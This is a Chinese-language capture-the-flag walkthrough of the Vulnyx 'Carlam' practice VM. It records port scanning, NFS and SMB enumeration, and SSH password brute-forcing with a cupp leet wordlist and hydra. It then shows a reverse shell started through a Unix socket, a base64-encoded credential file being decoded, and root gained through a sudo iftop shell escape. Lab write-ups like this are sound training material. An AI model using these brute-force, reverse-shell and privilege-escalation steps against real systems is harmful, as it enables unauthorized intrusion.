Vulnyx-Carlam-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.171  08:00:27:75:82:e2       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:ef:e4:ce       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.044 seconds (125.24 hosts/sec). 4 responded
❯ export ip=192.168.60.171
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.171:22
Open 192.168.60.171:111
Open 192.168.60.171:139
Open 192.168.60.171:445
Open 192.168.60.171:2049
Open 192.168.60.171:32947
Open 192.168.60.171:34643
Open 192.168.60.171:38753
Open 192.168.60.171:42273
Open 192.168.60.171:53253
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-07 20:34 CST
Initiating ARP Ping Scan at 20:34
Scanning 192.168.60.171 [1 port]
Completed ARP Ping Scan at 20:34, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:34
Completed Parallel DNS resolution of 1 host. at 20:34, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:34
Scanning 192.168.60.171 [10 ports]
Discovered open port 32947/tcp on 192.168.60.171
Discovered open port 38753/tcp on 192.168.60.171
Discovered open port 111/tcp on 192.168.60.171
Discovered open port 22/tcp on 192.168.60.171
Discovered open port 445/tcp on 192.168.60.171
Discovered open port 139/tcp on 192.168.60.171
Discovered open port 53253/tcp on 192.168.60.171
Discovered open port 34643/tcp on 192.168.60.171
Discovered open port 42273/tcp on 192.168.60.171
Discovered open port 2049/tcp on 192.168.60.171
Completed SYN Stealth Scan at 20:34, 0.03s elapsed (10 total ports)
Nmap scan report for 192.168.60.171
Host is up, received arp-response (0.00072s latency).
Scanned at 2025-05-07 20:34:59 CST for 0s

PORT      STATE SERVICE      REASON
22/tcp    open  ssh          syn-ack ttl 64
111/tcp   open  rpcbind      syn-ack ttl 64
139/tcp   open  netbios-ssn  syn-ack ttl 64
445/tcp   open  microsoft-ds syn-ack ttl 64
2049/tcp  open  nfs          syn-ack ttl 64
32947/tcp open  unknown      syn-ack ttl 64
34643/tcp open  unknown      syn-ack ttl 64
38753/tcp open  unknown      syn-ack ttl 64
42273/tcp open  unknown      syn-ack ttl 64
53253/tcp open  unknown      syn-ack ttl 64
MAC Address: 08:00:27:75:82:E2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 11 (468B) | Rcvd: 11 (468B)

没有常规的80端口，不过存在nfs服务开放，还有smb服务

NFS 挂载

查看nfs挂载的哪些目录

❯ showmount -e $ip
Export list for 192.168.60.171:
/tmp/carlam *
/srv/share  *

尝试挂载一下/srv/share

得到三个文件，有个提示.notes不要使用leet

并且存在一个微型小说，不知道有什么用

❯ mkdir nfs
❯ sudo mount -t nfs $ip:/srv/share ~/vulnyx/nfs
[sudo] password for Pepster:
❯ cd nfs
❯ ls -al
total 416
drwxrwxrwx  2 root    root      4096 May  6 05:36 .
drwxr-xr-x 15 Pepster Pepster  36864 May  7 20:39 ..
-rw-rw-r--  1 Pepster Pepster 372208 May  6 04:47 carlampio.jpg
-rw-rw-r--  1 Pepster Pepster    542 May  6 04:47 microrelato.txt
-rw-r--r--  1 Pepster Pepster     74 May  6 04:42 .notes
❯ cat .notes
Upgrade packages
Remove unused applications
Not use Leet
Remove old users
❯ cat microrelato.txt
Con ese amargor tan extraño, que primero le acompañó en las fiestas de guardar. Después, amargo, que baja por la laringe, para los fines de semana; y casi sin darse cuenta amargor dulzón de entre semana, que los días se hacen muy largos... Pero más agrio fue el día que entró en el juzgado para defender al pobre camello. Acre, como la condena por atentado contra la salud pública. Y más bien agridulce sabor con la garganta amarga para argumentar tristemente, entre sus dientes dormidos:
- La sociedad es la culpable, señoría-.

猜测可能是用此小说内容作为字典，经过leet处理后进行爆破吧

尝试无果后，利用enum4linux 探测smb服务相关信息

得到三个用户carlampio xiroi aitana

❯ enum4linux -a $ip
………………………………
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\carlampio (Local User)
S-1-22-1-1001 Unix User\xiroi (Local User)
S-1-22-1-1002 Unix User\aitana (Local User)
………………………………

并且jpg图片的文件与其中一个用户相同

尝试利用cupp生成字典

❯ python3 cupp.py -i
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | [email protected] ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: carlampio
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]: Y

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to carlampio.txt, counting 16 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with carlampio.txt and shoot! Good luck!

用户提权

尝试爆破得到凭证carlampio:C4rl4mp10

❯ hydra -l carlampio -P carlampio.txt ssh://$ip -I -e ns
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-07 20:45:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 18 login tries (l:1/p:18), ~2 tries per task
[DATA] attacking ssh://192.168.60.171:22/
[22][ssh] host: 192.168.60.171   login: carlampio   password: C4rl4mp10
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-07 20:45:58

尝试ssh登录一下

❯ ssh carlampio@$ip
The authenticity of host '192.168.60.171 (192.168.60.171)' can't be established.
ED25519 key fingerprint is SHA256:ykzjBJGULKXUmEAwPTuY9AL1Bjo/IkqaqEZfM5RsY4I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.171' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Welcome to CARLAM!
VM Vulnerable to improve your hacking skills
by Micky
carlam:~$ cat user.txt
23bdb9bfae27f13a9e216fa72fcdf9c5

我尝试再次信息收集，可以看到/tmp目录下并不存在carlam

sock 连接

不过存在一个app.sock套接字连接文件（Unix Domain Socket）

carlam:~$ cd /tmp/
carlam:/tmp$ ls -al
total 16
drwxrwxrwt    4 root     root          4096 May  7 14:33 .
drwxr-xr-x   21 root     root          4096 May  5 22:04 ..
drwxrwxrwt    2 root     root          4096 May  7 14:33 .ICE-unix
drwxrwxrwt    2 root     root          4096 May  7 14:33 .X11-unix
srwxrwxrwx    1 xiroi    xiroi            0 May  7 14:33 app.sock

开始我尝试利用nfs配置中的rw，可以在/tmp/carlam文件夹写入文件

不知道什么原因，挂载不上，失效的文件句柄，之前是可以正常的，复现的时候就不行了😅

carlam:/tmp$ id
uid=1000(carlampio) gid=1000(carlampio) groups=1000(carlampio)
carlam:/tmp$ mkdir carlam
carlam:/tmp$ cd carlam/
-----------------------------------
❯ mkdir carlam
❯ sudo mount -t nfs $ip:/tmp/carlam ~/vulnyx/carlam
mount.nfs: Stale file handle for 192.168.60.171:/tmp/carlam on /home/Pepster/vulnyx/carlam
❯ cd carlam

具体利用可以参考NFS no_root_squash/no_all_squash 配置错误 PE - HackTricks

不过这仅仅是个兔子洞，虽然可以生成属于其他用户的文件但无法进行suid提权，靶机内不存在bash，只有ash

换个方向，专注于app.sock

可以利用socat与套接字交互，并且靶机内是存在socat的

随意输入字符，会有回显，通过查看help

可以进行创建反向shell

carlam:/tmp$ which socat
/usr/bin/socat
carlam:/tmp$ socat - unix-connect:/tmp/app.sock
aa
What the hell?. Use 'help'.
carlam:/tmp$ socat - unix-connect:/tmp/app.sock
help
Commands:
  help           → Show this messaje
  whoami         → Show real user
  list           → List files in /home/xiroi
  create_reverse_shell   → Shell in 4444

新开一个tty，连接一下

❯ ssh carlampio@$ip
[email protected]'s password:
Welcome to CARLAM!
VM Vulnerable to improve your hacking skills
by Micky
carlam:~$ nc -lvp 4444
listening on [::]:4444 ...

------------------
carlam:/tmp$ socat - unix-connect:/tmp/app.sock
create_reverse_shell
[xiroi] Shell in 4444
carlam:/tmp$

这样就拿到xiroi用户的shell了

在家目录中的.conf文件夹内发现存在base64编码

carlam:~$ nc -lvp 4444
listening on [::]:4444 ...
connect to [::ffff:127.0.0.1]:4444 from carlam.my.domain:42181 ([::ffff:127.0.0.1]:42181)
/bin/ash: can't access tty; job control turned off
/ $ bash
/bin/ash: bash: not found
/ $ id
uid=1001(xiroi) gid=1001(xiroi) groups=1001(xiroi)
/ $ cd ~
/home/xiroi $ ls -al
total 40
drwxr-x---    5 xiroi    xiroi         4096 May  6 04:46 .
drwxr-xr-x    5 root     root          4096 May  6 01:21 ..
drwxr-xr-x    2 xiroi    xiroi         4096 May  6 04:43 .apps
-rw-------    1 xiroi    xiroi           21 May  6 04:50 .ash_history
drwxr-xr-x    2 xiroi    xiroi         4096 May  6 04:44 .conf
drwx------    2 xiroi    xiroi         4096 May  6 04:40 .ssh
-rwxr-xr-x    1 xiroi    xiroi        15600 May  6 03:51 app
/home/xiroi $ cd .conf
/home/xiroi/.conf $ ls -al
total 20
drwxr-xr-x    2 xiroi    xiroi         4096 May  6 04:44 .
drwxr-x---    5 xiroi    xiroi         4096 May  6 04:46 ..
-rw-r--r--    1 xiroi    xiroi           13 May  6 04:44 .hi
-rw-r--r--    1 xiroi    xiroi           33 May  6 04:42 .scrt
-rw-r--r--    1 xiroi    xiroi           13 May  6 04:44 sort
/home/xiroi/.conf $ cat *
132409878765
/home/xiroi/.conf $ cat .*
cat: read error: Is a directory
cat: read error: Is a directory
abcdefghi...
YWl0YW5hOjQxdDRuNFNfUzNjcjN0Cg==

Root提权

解码即得到用户凭证aitana:41t4n4S_S3cr3t

再次登录，用户拥有sudo权限

/home/xiroi/.conf $ cat .scrt|base64 -d
aitana:41t4n4S_S3cr3t
---------------------------------
carlam:/tmp$ su aitana
Password:
carlam:/tmp$ id
uid=1002(aitana) gid=1002(aitana) groups=1002(aitana)
carlam:/tmp$ sudo -l
User aitana may run the following commands on carlam:
    (ALL) NOPASSWD: /usr/sbin/iftop

输入!/bin/sh

正常提权即可

carlam:/tmp$ sudo /usr/sbin/iftop
interface: eth0
IP address is: 192.168.60.171
MAC address is: 08:00:27:75:82:e2
carlam:/tmp# id..
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
carlam:~# cat /root/root.txt
9755cbb374f1a6b47d52160a452b7084